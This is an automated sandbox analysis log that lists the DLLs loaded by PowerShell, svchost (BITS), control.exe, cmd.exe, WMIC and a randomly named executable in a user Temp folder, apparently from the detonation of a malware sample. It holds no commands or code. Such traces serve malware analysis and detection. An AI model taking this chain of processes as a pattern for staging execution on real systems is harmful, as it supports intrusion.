Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
